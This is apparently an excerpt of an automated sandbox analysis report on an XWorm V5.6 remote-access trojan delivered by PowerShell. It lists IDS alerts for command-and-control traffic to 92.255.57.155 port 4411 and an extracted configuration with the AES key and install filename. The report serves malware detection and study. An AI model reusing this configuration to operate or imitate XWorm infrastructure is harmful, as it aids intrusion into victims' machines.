2024-12-29T09:51:01.222593+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.383482+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.851191+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.142201+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.465885+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.630456+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:02.905722+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.665531+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.875638+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:03.996284+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.504595+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.715168+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.796051+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:04.925368+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.125989+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.182844+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.336382+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.572643+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.781289+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:05.905298+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.270171+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.480651+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:06.693300+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:29.367466+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:38.955890+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:49:16.610128+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:30.466737+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:44.404637+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:49:58.406885+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:03.047504+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.245200+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.364800+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.484146+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.667286+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.786671+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:04.950315+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:05.714918+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:05.913851+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:06.060632+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.000734+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.120152+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.379532+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.540764+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:07.660213+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:08.473940+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:08.913204+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:09.043552+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:09.163558+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:10.085689+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:10.944601+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:11.597885+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:11.760592+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:12.783218+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:12.879169+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.092410+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.215338+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.347191+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.508742+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.630052+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.664090+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.817332+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.980694+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:15.106876+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:15.228324+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:16.796283+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:16.856975+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.195385+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.476686+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.639428+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.599894+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.814311+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.933617+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:19.292357+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:20.837412+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.076005+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.539311+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.656884+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:22.416426+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.153286+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.321307+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.440756+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.560131+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.679769+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.801288+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:24.829139+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:24.948706+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.454744+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.525094+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.765302+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:26.616898+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:26.815774+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.054545+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.432692+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.733196+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.993193+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:28.915978+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.175217+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.266101+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.336681+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.567348+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:30.269550+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:30.944889+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.173180+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.388108+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.507470+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.635975+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:32.361841+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.039288+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.737075+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.910964+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:35.030635+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:36.403723+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.054426+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.269208+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.388514+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.788142+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:38.081916+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:38.881240+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.125210+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.245347+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.365182+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.485076+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.604568+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.586807+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.799214+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.918759+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:41.421216+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:41.632142+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:42.725987+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.124721+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.309216+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.457218+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.624505+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:44.267988+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:44.955130+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:45.946339+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:46.243164+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.070658+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.192304+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.401428+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:47.488304+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:48.163875+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:48.840868+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.004491+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.124073+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.337934+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:49.576067+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:51.362069+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:51.648618+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:51.988006+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:53.731329+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:54.820056+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.058821+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.275245+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.527332+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.700544+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:55.903636+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:56.741940+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:56.925894+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.072634+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.235446+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:57.298726+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:58.684333+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:00.101454+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:00.435977+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:00.731439+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.053669+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.223506+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.462274+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:01.852300+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:02.466846+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:02.644798+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.038662+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.666431+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:03.876501+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.159384+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.796099+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:04.868680+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.147864+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.271370+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.451332+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:05.575348+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:51:06.024480+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP

ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:49:29.301964+0100	2858801	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:50:09.622287+0100	2858799	1	Malware Command and Control Activity Detected	192.168.2.4	49730	92.255.57.155	4411	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 92.255.57.155.ps1	Virustotal: Detection: 8%			Perma Link
Source: 92.255.57.155.ps1	ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 92.255.57.155
Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 4411
Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: P0WER
Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.Management.ni.dll source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdbX source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1701713981.000001B5A1990000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbUV source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
